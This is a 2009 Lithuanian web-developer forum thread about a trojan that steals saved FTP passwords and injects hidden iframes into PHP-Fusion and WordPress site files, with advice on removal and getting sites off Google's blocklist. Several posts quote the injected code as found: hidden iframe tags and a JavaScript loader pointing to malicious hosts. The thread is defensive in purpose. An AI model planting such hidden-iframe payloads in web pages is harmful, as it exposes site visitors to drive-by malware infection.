Temos pavadinimas: WordPress, Shopify ir PHPFusion programuotojų bendruomenė :: INFORMACIJA: BACKDOOR Trojanas, iframe VIRUSAS
Parašė ozzWANTED· 2009 Lie. 25 20:07:45
#1
Taigi, norėčiau informuoti, kad internete pasklido backdoor trojanai.
Principas - užkrečiami Jūsų tinklapio failai. Užkrėtimų pavyzdys:
<iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi115" width=125 height=125 style="visibility: hidden"></iframe>
Bei:
echo "<iframe src=\"http://fabujob.com/?click=[ID]\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
Redirectas pirmojo adreso eina į:
http://xb5.ru:8080/index.php
Per kelias pastarasias dienas sugebėjau patekti į 3
LIETUVIŠKUS taip apkrėstus saitus. Bijau dabar sumeluoti, bet n-design.lt buvo tame sąraše irgi.
Kaip suprantu backdoor'as išnaudoja kartu ir Internet Explorer 7 ( o gal ir 8) saugumo kažkokią tai spragą, tad nerekomenduočiau eiti į nepatikimus saitus su IE7 artimiausiu metu.
Jeigu visgi tai padarysite, rizikuojate apskrėsti Malware virusu, iš serijos:
wpv[number].exe
arba:
_ex-68.exe
Kaip softą naikinantį šiuos virusus rekomenduočiau išbandyti:
malwarebytes anti-malware
NOD32 viruso tinkamai pašalinti nesugeba. :)
Redagavo ozzWANTED· 2009 Rugp. 2 21:08:52
Parašė MAnjack· 2009 Lie. 25 20:07:28
#2
Reikėjo geriau parašyti kaip apsisaugoti nuo tokių virusų :)
Parašė mNm.· 2009 Lie. 25 21:07:03
#3
Jooo, draugas prašė išnaikint padėt tai locale failuose (ne vien locale) būna jis aš atkurdavau eilutes su default fusion'o failas. :) Ir chmod 444 bereods. :D
Parašė MAnjack· 2009 Lie. 25 21:07:49
#4
Būtų įdomu sužinoti ar chmod 644 tikrai veikia. Aš kažkam siūliau šitą variantą, bet efektyvumo tai ir neparašė ;D
Parašė Kelmas· 2009 Lie. 25 21:07:53
#5
Nuo šito VIRUSO apsisaugoti galima labai paprasta. Tiesog reikia kad jūsų FTP kliente neįsimintu slaptažodžio, kadangi šitas virusas veikia ir ieško po visas FTP programas slaptažodžius kurios programos įsimina. AVG šita virusa pašalina tinkamai jei ką domina. :)
Parašė Žmogus· 2009 Lie. 25 21:07:59
#6
Kai ateinu į saitą ir pamau, kad nuo višaus yra labai didelis tarpas jau suprantu, kad apkrėtas, dažniausiai būna, maincore.php pačiam gale, locale/ forum/main.php admin/main.php dar index.php
Parašė ozzWANTED· 2009 Lie. 25 21:07:36
#7
O gal kas žinot ar yra ant IE bugfix'as koks, kad pataisytų šitą malware. Ir gal kas žinot listą programų kurias patikrina, t.y. pvz. ar FZ senesnes versijas ir pan?
Parašė mNm.· 2009 Lie. 25 21:07:22
#8
ozzWANTED parašė:
O gal kas žinot ar yra ant IE bugfix'as koks, kad pataisytų šitą malware. Ir gal kas žinot listą programų kurias patikrina, t.y. pvz. ar FZ senesnes versijas ir pan?
Abejoju ar dabar yra IE fix'as. Vėliau webmasteriai pastebėję šį virusą, padarys ir fix'ą. ( O gal jau jį kuria. :) )
Redagavo mNm.· 2009 Lie. 25 21:07:00
Parašė sigitas123· 2009 Lie. 25 21:07:34
#9
Jo kaip ištrinti tą virusą draugo saite pasklido tai užblockino mozilą
Parašė ozzWANTED· 2009 Lie. 25 21:07:41
#10
1.Pašalink virusą iš kompo.
2.Pasikeisk visus FTP ir Direct Admin slaptažodžius.
3.Atsiųsk saito failus ir pašalink užkrėstą kodą.
Parašė ozzWANTED· 2009 Lie. 25 21:07:15
#11
http://www.delfi.lt/news/economy...d=23184420
"..
„Kaspersky Lab.“ saugumo ekspertai perspėja apie naujo tipo kompiuterių kenkėjų, kurie pasinaudoja nekaltais interneto portalais, bangą. Jie sparčiai plinta, nes išnaudoja ir „Google“ paieškos sistemą.
„Kibernetiniai nusikaltėliai braunasi į nepakankamai apsaugotas interneto svetaines, kurias paverčia virusų skleidėjomis. Virusu vartotojas gali užsikrėsti tiesiog apsilankęs užgrobtoje svetainėje“, – pranešime spaudai cituojamas programinės įrangos platintojo „Atviros informacinės sistemos“ saugumo specialistas Andrius Šaveiko – „Per naršyklę iš tinklalapio patekęs į vartotojo kompiuterį, kenkėjas renka konfidencialią informaciją ir prisijungimo prie FTP serverių duomenis, kad galėtų apkrėsti kitus tinklalapius. Taip užgrobtų svetainių ir kompiuterių ratas sparčiai plečiasi“.
Pavojingiausias ir plačiausiai žinomas toks per interneto svetaines plintantis kenkėjas – Trojos arklys „Gumblar.a“. Jis per birželio mėnesį plito devynis kartus aktyviau nei gegužę ir užkrėtė daugiau nei 27 tūkst. interneto svetainių. Nuo šio kenkėjo nukentėjo pačios įvairiausios paskirties svetainės – verslo įmonių, restoranų, nevyriausybinių organizacijų, asmeniniai ir kiti tinklalapiai.
Pasak A. Šaveiko, „Gumblar.a“ virusas savo plitimui išnaudoja ir „Google“ paieškos sistemą. Jis apkrėstą svetainę optimizuoja taip, kad ji būtų pateikiama kuo aukštesnėje „Google“ paieškos rezultatų pozicijoje, o dėl to daugiau vartotojų, paspaudę nuorodą, patektų į nesaugius tinklalapius bei apkrėstų savo kompiuterį.
„Kai šį Trojos arklį pasigauna vartotojas, yra daug šansų, kad jis gaus visą „puokštę“ kitų virusų. Kenkėjas taip pat užblokuoja antivirusines programas ir priėjimą prie jų tinklalapių, o kompiuteryje įrašo netikrą antivirusinę programinę įrangą“, – aiškino „Atviros informacinės sistemos“ specialistas. „Be to, apkrėsto kompiuterio vartotojas „Google“ paieškos sistemoje uždavęs vienokią užklausą, bus nukreipiamas į visai su užklausa nesusijusius rezultatus, vedančius į kitus užkrėstus tinklalapius“.
Ekspertų vertinimų, „Gumblar.a“ ir kiti analogiški kenkėjai yra pakankamai bjaurūs ir pavojingi, ypač jeigu ir toliau išlaikys dabartines plitimo tendencijas. Neturinčiam tinkamos saugumo programos vartotojui gali tapti pavojinga užsukti net į gerai pažįstamus tinklalapius, kuriuose lankėsi vakar, nes jie jau gali būti apkrėsti. Be to, kenkėjai renka konfidencialią vartotojo informaciją, prisijungimo prie bankų kodus ir pan. .."
©Delfi.lt
Parašė manex· 2009 Lie. 25 21:07:56
#12
Čia ne vienintelis toks yra man pasitaikė ir kitas kuris įdedą į index.php failus pačiame gale tiesiog automatiškai prisirašo ir tu nežinai iš kur jis atsirado.
Na, o pats kodas atrodo taip:
require_once "side_right.php";
require_once "footer.php";
?><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>
><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>
paryškinau ta kodą kuri įdeda į index.php, nesvarbu ar jis yra prirašytas ar tuščias tiesiog ji prirašo.
Na, o aš juos išnaikinau tiesiog peržiūrėdamas visus index.php failus ir tuos kodus ištryniau.
Redagavo manex· 2009 Lie. 25 22:07:57
Parašė ozzWANTED· 2009 Lie. 25 22:07:13
#13
Ne tik į index.php, bet ir į kitus įsirašo, ir ne tik tokiais URL. Tiesiog reiktų Notepad++ su "find in files" <iframe paieška duoti per visus saito failus.
Parašė manex· 2009 Lie. 25 22:07:39
#14
Pas mane buvo vienas tarp kas kokio kito failo, bet neprisimenu, o
php-fusion failus pražiūrėjau visus tai tik toks kodas te buvo ir tarp index.php failų.
Parašė ozzWANTED· 2009 Lie. 25 22:07:58
#15
Aš tai apskritai šiandien labai supykau ant Micro
SHIDO kad jis sugeba tokias milžiniškas security holes palikti ant savo softo....
Parašė Alchašas· 2009 Lie. 25 22:07:28
#16
Pamačiau temą ir juoktis pradėjau... Šitas virusas siaučia jau geri 3mėnesiai tik antvirusinės updeit'ų šitam neturėjo tik prieš mėnesį juos įsirengė, bet visgi matau kaip visad neupdeitinat antvirusinių. :D
Aš į
php-f saitus jau net nevaikštau nes kas 3saitas sėdi su tokiu virusiuku. ;)
Parašė ozzWANTED· 2009 Lie. 25 22:07:10
#17
Bent jau nod'o 32 net naujausia versija negaudo laiku kai reikia. Praleidžia infiltruotis į sistema. Ir išnaikinti NOD nesugeba gerai manau.
Malwarebytes' Anti-Malware šitas gerai naikina.
Parašė Alchašas· 2009 Lie. 25 23:07:27
#18
Nežinau kaip tau čia taip, bet turiu AdAware kuris puikiai išnaikina, o ponaitis ESS 4 perspėja kada reikia pasinaudoti geriausiu desktop draugu AdAware. ;)
Parašė dyaz· 2009 Lie. 25 23:07:44
#19
manex parašė:
Čia ne vienintelis toks yra man pasitaikė ir kitas kuris įdedą į index.php failus pačiame gale tiesiog automatiškai prisirašo ir tu nežinai iš kur jis atsirado.
Na, o pats kodas atrodo taip:
require_once "side_right.php";
require_once "footer.php";
?><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>
><iframe src="http://davajtemnedenegsejchas.com/spl1/?f115c845296f7ba3144dc004201e3f86" width=1 height=1 style="visibility:hidden"></iframe>
paryškinau ta kodą kuri įdeda į index.php, nesvarbu ar jis yra prirašytas ar tuščias tiesiog ji prirašo.
Na, o aš juos išnaikinau tiesiog peržiūrėdamas visus index.php failus ir tuos kodus ištryniau.
Man kažkas panasaus buvo atsiradę maincore.php faile ?|
Parašė Alchašas· 2009 Lie. 25 23:07:32
#20
Taigi jis lenda į visur kas susiję su index.php šiuo atveju index.php>maincore.php
Parašė andriuxa· 2009 Lie. 26 00:07:34
#21
as galvojau kas per sudas su mano webu darosi... visada sugadintas index.php maincore.php forum/index.php ir administratio/index.php
ir visuose buna iframe
<iframe src="http://x8y.ru:8080/ts/in.cgi?pepsi115" width=125 height=125 style="visibility: hidden"></iframe>
dabar viskas aisku :)
aciu uz info dabar zinosiu :)
Redagavo andriuxa· 2009 Lie. 26 00:07:17
Parašė dyaz· 2009 Lie. 26 00:07:31
#22
Man susigadindavo mainteriance pastoviai... žinostim, žinosim.
Parašė Alchašas· 2009 Lie. 26 01:07:13
#23
Viena iš pirmųjų šio grobuonies aukų ir buvau aš lietuvoje, o gal net ir visa ko pradininkas. ?| Vienu žodžiu viskas prasidėjo nuo paprastų dainų siuntimosi iš grizzlis.lt. :)
Parašė ozzWANTED· 2009 Lie. 26 22:07:52
#24
Dar daugiau informacijos:
Symantec oficialiai pranešė, kad egzistuoja kritinis Adobe flash pažeidžiamumas.
Situacija yra gan rimta kadangi hakeriai šį pažeidžiamumą gali labai lengvai išnaudoti tiesiog reikia auką priversti atsidaryti užkrėsta tinklapį arba atidaryti el.paštu gauta .PDF formato failą.
Simantec taip pat teigia, kad pažeidžiamumą galima išnaudoti su betkuria programine įranga kuri naudoja flash elementus.
Oficialiame Adobe blog'e teigiama, kad pažeidžiamumas egzistuoja šiuose Adobe produktuose : Adobe Reader, Acrobat 9.1.2, Adobe Flash Player 9, Adobe Flash Player 10. Adobe šiuo metu dirba prie šio pažeidžiamumo ir galime tikėtis, kad greitu metu išleis pataisymų paketus šioms versijoms.
Symantec praneša, kad trojanas pavadinimu Trojan.Pidief.G būtent ir plinta pasinaudodamas šiuo flash pažeidžiamumu. Operacinės sistemos kurios gali būti infekuotos šiuo trojos arkliu yra : Windows XP ir Windows Vista jei yra išjungtas User Account Control (UAC).
Jei norite laikinai apsisaugoti yra rekomenduojama atlikti šiuos veiksmus:
Susiraskite šiuos du failus ir juos pervadinkite:
"%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll" ir "%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll".
Taip pat savo interneto naršyklės nustatymuose reikėtu laikinai išjungti Flash funkciją.
Rekomendacija: Nepatartina atidarinėti jokių neaiškių .PDF formato failų ar lankytis nuorodose su .pdf galunėmis pavyzdžiui:
http://www.blogas_tinklapis.com/failas.pdf
Pagal ©KING
Parašė Rytis· 2009 Lie. 26 22:07:38
#25
Nenaudoti IE. Nenaudoti MS produkcijos. Nesukti sau galvos. ;)
Parašė manex· 2009 Lie. 26 22:07:02
#26
Na čia nieko nepadarysi nors ir tu antivirusine atsinaujinsi. Pavyzdžiui pas mane yra AVG ir AVG IDENTITY Protection beto dar yra užsakyta teo triguba apsauga na nežinau ar ji padeda ar ne bet kartais ir neileidžia į kai kuriuos tinklapius rašo, kad tinklapis yra nesaugus tai ir neįeisi :)
Parašė Fortke· 2009 Lie. 27 18:07:50
#27
O tai sakykit, kaip mynejo cia kad nod32 neisvalo to virsuo, tai net nevalyti su nobu? ka daryti tada? su kitokia anti-virus programa valyti? ar kaip?
Parašė ozzWANTED· 2009 Lie. 27 19:07:14
#28
Buvo juodai boldu parašyta. Dar kartą kartoju. Šį trojaną išvalo ši programa:
malwarebytes anti-malware
Atsisiųsti ją gali iš:
http://www.malwarebytes.org/mbam...
Užtenka atsisiųsti
FREEWARE versiją.
Instaliavę darykite FULL systemą scan'ą.
Parašė Alchašas· 2009 Lie. 28 11:07:54
#29
Durni ar kaip? :D Sakau pasakiau kas gali būti naudinga, bet žiūriu mano patarimais nesinaudojama. So WTF I was writing and trying to help you guys?
Parašė CodeRS· 2009 Rugp. 1 20:08:53
#30
Šis trojanas nepriklausomai nuo naršyklės įlenda į jūsų kompiuterį per PDF. Jeigu naršyklė PDF failus atidarinėja viduje ir jeigu neturite antivirusinės - tai galimas daiktas, kad jūs jau esate užsikrėtę. Kažkada gavau laišką su pranešimu, kad per Adobe Acrobat Reader (PDF Readeris) turi rimtą spragą. Reikia išjungti
JavaScript'ą PDF readeryje (Preferences > Advanced >
JavaScript). Aš tai išgirdęs tiesiog išinstaliavau šitą programą ir atsisiunčiau kažkokia tai FREE. Tai jei užklysdavau į tokią ifreimais užkrėstą svetainę man tiesiog blogiausiu atveju pasileisdavo tas PDF skaitytuvas su hieroglifais vietoje teksto. O kaip išssigydyti nuo jo? Tiesiog dabar jau betkokia antivirusinė manau susidoroja su šiuo virusu. Po praskanavimo pasikeiskite visus savo žinomų FTP slaptažodžius. Nes tas trojanas renka ftp paswordus ir vėliau prisijungia prie jūsų hostingų ir redaguoja failus įkišdamas tuos iframe.
Žiauriausia buvo kaip tokiu trojanu užsikrėtė vienas iš adminu textadds sistemos. Tai automatiškai visi vartotojai kurie naudojosi ta reklamų apsikeitimo sistema tapo trojano platintojais.
Sėkmės :)
Parašė dyaz· 2009 Rugp. 1 23:08:27
#31
Kai iejnu i savo tinklapi reguoja flash playeris...
Parašė cipis· 2009 Rugp. 2 20:08:42
#32
---> Sveiki Stai. Jau koki 1menesi laiko kankinuosi su 1 ikirus virusau, istrinu ir vel po keliu dienu atsiranda...
Keiciau ftp pas ir t.t Gal kas patars ka daryti? Duodu viruso pavizdi
Cia nespauskit, Virusas :)
<iframe src="http://xc7.ru:8080/index.php" width=147 height=192 style="visibility: hidden"></iframe>
Parašė sigitas123· 2009 Rugp. 2 20:08:15
#33
---> cipis padeti? duok skype
Parašė cipis· 2009 Rugp. 2 21:08:55
#34
---> O is kur man zinot ar nepakenksi dar labeu? :D
-----------------------------------------------------
Bet nemanau kad gali pakenkt labeu nei yra pakenkta :D
-----------------------------------------------------
Na nebent Pavogtum ftp su 25lt ;) :o
Parašė sigitas123· 2009 Rugp. 2 21:08:40
#35
---> neprašau jokiu duomenu... Man ir taip buvo tai susitvarkiau
Parašė cipis· 2009 Rugp. 2 21:08:31
#36
---> I privacia zinute , skype id ;)
Parašė Majakas· 2009 Rugp. 5 13:08:27
#37
---> Stai koke beda iframe virusas mano saite, tiagi viusus failus persikeliu i PC paskanuoju su AVG ji randa virusus pasalinu tuos failus ir ikeliu naujus bet praejus kokem taj laiko tarpui wel wirusas ATSIRANDA, ka daryt ? :o
Parašė MAnjack· 2009 Rugp. 5 13:08:28
#38
---> Bandyk chmod tuos failus į 444.
Parašė Majakas· 2009 Rugp. 5 13:08:17
#39
---> Warning: require_once(includes/multisite_include.php) [function.require-once]: failed to open stream: No such file or directory in /home/majakas/csfun.xz.lt/maincore.php on line 68
Fatal error: require_once() [function.require]: Failed opening required 'includes/multisite_include.php' (include_path='.:') in /home/majakas/csfun.xz.lt/maincore.php on line 68
Stai ka dabar raso :|
Parašė MAnjack· 2009 Rugp. 5 13:08:25
#40
---> includes/multisite_include.php failą ištrynei :)
Parašė Giedrunskis· 2009 Rugp. 5 13:08:35
#41
---> Pasalink virusus is svetaines, poto is pc :D o poto pasikeiti visus paswordus ;)
Parašė Majakas· 2009 Rugp. 5 14:08:40
#42
---> Db kai tie failai su chmodinti klaidu webe wisur daug daug :D erroru
Parašė MAnjack· 2009 Rugp. 5 14:08:51
#43
---> tai ne visus reikėjo ;)
Parašė Majakas· 2009 Rugp. 5 14:08:34
#44
---> Tai chmodinau tik tuos kur wirusas buwo, bet ikeliau sena maincore.php ir susitvarke viskas :)
Parašė XruN· 2009 Rugp. 11 20:08:40
#45
---> Sveiki tiksliai nzn ar cia rasau. Taciau toks dalykas pas mane yra mano swr.lt domena uzblokavo google.lt as pasalinau ta virusiuka ka dabar daryti kad atblokotu nes laukiu nesulaukiu kol atblokos jau menesis kox gal kaip neatblokoja. girdejau kad reikia rasyti google.lt laiska elektronini taip? padekite kas zinote
Parašė XruN· 2009 Rugp. 11 20:08:30
#46
busiu labai dekingas.
Parašė FanatiC· 2009 Rugp. 11 20:08:30
#47
O tu nebandei su kita naršyke eiti? Arba dar pažiūrėti ar yra virusas,gal ten iframe,kurio tu taip lengvai nepašalinsi,trynk netrynes vistiek atsiradinės poros dienų tarpe.
Parašė XruN· 2009 Rugp. 11 21:08:36
#48
Supranti as viska apsoliuciai istrines buvau ir direktorija ir is xz.lt domenu ir
mysql ir pewr naujo suiinstaliavau pradejau nuo 0 taciau man vistiek uzblokotas
Parašė XruN· 2009 Rugp. 11 22:08:26
#49
Na tai kasnors zinote kaip cia atsiblokoti?
Parašė MAnjack· 2009 Rugp. 11 22:08:09
#50
Tuoj užsifūdinsi iki bano.
Parašė Karolis· 2009 Rugp. 11 22:08:32
#51
Gal tu užsikrėtes esi tipo kaip per naujo įkelį faila ir vel užsikrečia. ;D
Parašė iGolf· 2009 Rugp. 11 22:08:18
#52
Dragelis parašė:
Nuo šito VIRUSO apsisaugoti galima labai paprasta. Tiesog reikia kad jūsų FTP kliente neįsimintu slaptažodžio, kadangi šitas virusas veikia ir ieško po visas FTP programas slaptažodžius kurios programos įsimina. AVG šita virusa pašalina tinkamai jei ką domina. :)
pritariu AVG be problemų veikia stabiliai ir gretai ir apsaugo nuo tokių dalykų
Parašė XruN· 2009 Rugp. 11 22:08:32
#53
nea as viska istriniau pakeiciau slaptazodzius perskanavau su anivirusine ir vat sukeliau naujus failus vika nuo 0 kaip ainu swr.xz.lt nieko nemeta kaip ainu swr.lt tada ismeta ta lentele kad svetaine laikoma kenkejiska google.lt uzblokavus yra
Parašė XruN· 2009 Rugp. 12 14:08:40
#54
Tai padesite? vakar nesulaukiau atsakymo snd gal sulauksiu
Parašė MAnjack· 2009 Rugp. 12 14:08:16
#55
XruN parašė:
---> Sveiki tiksliai nzn ar cia rasau. Taciau toks dalykas pas mane yra mano swr.lt domena uzblokavo google.lt as pasalinau ta virusiuka ka dabar daryti kad atblokotu nes laukiu nesulaukiu kol atblokos jau menesis kox gal kaip neatblokoja. girdejau kad reikia rasyti google.lt laiska elektronini taip? padekite kas zinote
Parašyk ir sužinosi.
Parašė XruN· 2009 Rugp. 12 17:08:16
#56
tai vat jai galima linko noriu nes nerandu niekur linko kad google.lt parasyciau
Parašė saltukas· 2009 Rugp. 12 17:08:12
#57
---> Kaip gali i mano dtvs sistema, patekti i index faila stai tokia nuoroda: <iframe src="http://a5m.at:8080/index.php" width=110 height=175 style="visibility: hidden"></iframe>
Kiek ziurejau per google cia kazkoks virusas ar panasei, bet kaip jis patenka i tvs, perinstaliuoju viska per nauja ir vistiek atsiranda, tinklapis tada suleteja, avira blokuoja tinklapi net. Kaip atsikratyti sio viruso? KAip jis ten patenka? tas pats ir su
php fuison sistema. Beje hostas puslapiai.lt gal del prasto hostingo tiekejo? Mano du saitai jau uzkresti, viska perdarau pernauja, bet uz poros dienu vel sita nesamone atsiranda.
Parašė 7even· 2009 Rugp. 12 17:08:00
#58
---> man su dle irgi buwwo... nzn kaip apsisaugot ir man reiktu...
Parašė saltukas· 2009 Rugp. 12 17:08:56
#59
---> Man su dle ir
php fusion, kas zino kaip apsisaugoti? Matau cia ne man vienam tokia problema
Parašė Žmogus· 2009 Rugp. 12 17:08:59
#60
---> Pasikeisk FTP pass, praskenuok PC su AV arba Malwarebytes' Anti-Malware ir panašaus tipo progmamomis laikinai iš FTP programų ištrink pass kurie būni išsaugoti
Parašė saltukas· 2009 Rugp. 12 17:08:19
#61
---> reiks bandyti, dekui, kas dar kokiu patarimu turi?:)::):)::)
Parašė nesby· 2009 Rugp. 12 18:08:14
#62
---> Man
html irgi randa,perskanuok pc ir keisk pasw
Parašė ADXS· 2009 Rugp. 12 19:08:32
#64
---> o pagrinde i index.php lenda tie virusiniai skriptai? man i wordpress buvo ilindę, tai visuose index, dar header faile buvo.
Parašė XruN· 2009 Rugp. 12 22:08:04
#65
jo jus taip o kaip man padaryti ar parasyti i google.lt kad atblokintu man ta domena
Parašė Majakas· 2009 Rugp. 22 01:08:33
#66
Ir mane ta google uzblokino, nebezinau ka daryt tas virusas wis atsiranda ?| nors buvau visus failus naujus ikeles, ir passwordus imetes naujus, tai paaiskins kas nors kaip apsisaugoti nuo sito sudino viruso ? :[
Parašė darKy· 2009 Rugp. 22 01:08:35
#67
nieko neatsitiks jai aštą atsisiunčiau anti virusine ir dar pas mane pc yra avg?
Parašė nesby· 2009 Rugp. 22 14:08:18
#68
ShadoVw parašė:
---> Pasikeisk FTP pass, praskenuok PC su AV arba Malwarebytes' Anti-Malware ir panašaus tipo progmamomis laikinai iš FTP programų ištrink pass kurie būni išsaugoti
kaip istrinti is ftp programu pasw kurie issaugoti? Beje galima verifinti tada google greiciau patikrina,kazkam cia reikejo
Parašė Majakas· 2009 Rugp. 22 17:08:46
#69
Krc tas chmod nepadeda nei kiek ...
Parašė nesby· 2009 Rugp. 22 18:08:29
#70
Sitas budas tikrai pades jei nieks nepadeda! 1)perinstaliuot windowsus 2)per backup ar ka ten atnaujint web,nes rankiniu gal ka paliksit 3)pasw pakeisti
Parašė darKy· 2009 Rugp. 22 19:08:22
#71
darKy parašė:
nieko neatsitiks jai aštą atsisiunčiau anti virusine ir dar pas mane pc yra avg?
nieko neatsitiks?
Parašė nesby· 2009 Rugs. 6 13:09:26
#72
darKy parašė:
darKy parašė:
nieko neatsitiks jai aštą atsisiunčiau anti virusine ir dar pas mane pc yra avg?
nieko neatsitiks?
Kiek as zinau negalima 2 antivirusiu tureti kompe nes ziauriai uzlagins, nebent viena is ju aad-aware ar panasaus stiliaus
MANO KLAUSIMAS :
Pas mane buvo sis virusas, as ji panaikinau, net google cia patvirtino
http://www.google.com/safebrowsi...&hl=lt , kad to viruso nera patvirtino 09men 05d, bet kai ziuriu googlej tai dar raso : Tai tikriausiai žalinga Jūsų kompiuteriui.
http://www.google.lt/#hl=lt&sour...c2950ca4a6
Kodel taip raso, jei googlas patvirtino kad virusas pasalintas?
Parašė darKy· 2009 Rugs. 6 13:09:32
#73
man tas pats buvo ~1mėn dar taip domenas buvo užbanintas bet po to dingo
Parašė Kelmas· 2009 Rugs. 6 13:09:20
#74
Nesby parašė:
<....>
Kodel taip raso, jei googlas patvirtino kad virusas pasalintas?
ir paskutinį kartą įtartinas turinys rastas šioje svetainėje 2009-08-28.
Kur matai, kad praėjo 90 dienų? :D Lauk trys mėnesius.
Parašė nesby· 2009 Rugs. 6 13:09:53
#75
Dragelis parašė:
Nesby parašė:
<....>
Kodel taip raso, jei googlas patvirtino kad virusas pasalintas?
ir paskutinį kartą įtartinas turinys rastas šioje svetainėje 2009-08-28.
Kur matai, kad praėjo 90 dienų? :D Lauk trys mėnesius.
Paskutinį kartą „Google“ šioje svetainėje lankėsi 2009-09-05, ir paskutinį kartą įtartinas turinys rastas šioje svetainėje 2009-08-28.
Parašė Kelmas· 2009 Rugs. 6 13:09:23
#76
Nesby parašė:
Paskutinį kartą „Google“ šioje svetainėje lankėsi 2009-09-05, ir paskutinį kartą įtartinas turinys rastas šioje svetainėje 2009-08-28.
Suprask, kad ir jeigu google joje lankėsi ir neberado tu virusų, tai vistiek turi 90 dienų praeiti kaip garantas kad ir vėl nepasirodė jis.
Parašė dizzy· 2009 Rugs. 6 13:09:08
#77
Pas mane kazkodel rodo webe yra virusas issikeliu praskanuot NERA Mistika kazkokia :D
Parašė nesby· 2009 Rugs. 6 13:09:17
#78
Vaidelis parašė:
Pas mane kazkodel rodo webe yra virusas issikeliu praskanuot NERA Mistika kazkokia :D
nera viruso, pasalinau ir google patvirtino.Reikia dar pora dienu palaukt
Parašė dizzy· 2009 Rugs. 7 15:09:54
#79
Krc Ka daryt Webe meta virusa iframer. isikeliu failus praskanuoju NIEKO NERA. Ka daryt? :|
Parašė XSpresson· 2013 Vas. 16 05:02:10
#80
stai koki koda aptikau senden labai daug failu buvo uzkresta locale failai ir administrator index.php radau tokius kodus.
<script type=\"text/javascript\" language=\"javascript\" > (function () { var wm = document.createElement
('iframe'); wm.src = '
http://qevywmuv.ru/count28.php'; wm.style.position = 'absolute'; wm.style.border = '0'; wm.style.height = '1px'; wm.style.width = '1px'; wm.style.left = '1px'; wm.style.top = '1px'; if (!document.getElementById('wm')) { document.write('<div id=\'wm\'></div>'); document.getElementById('wm').appendChild(wm); }})();</script>";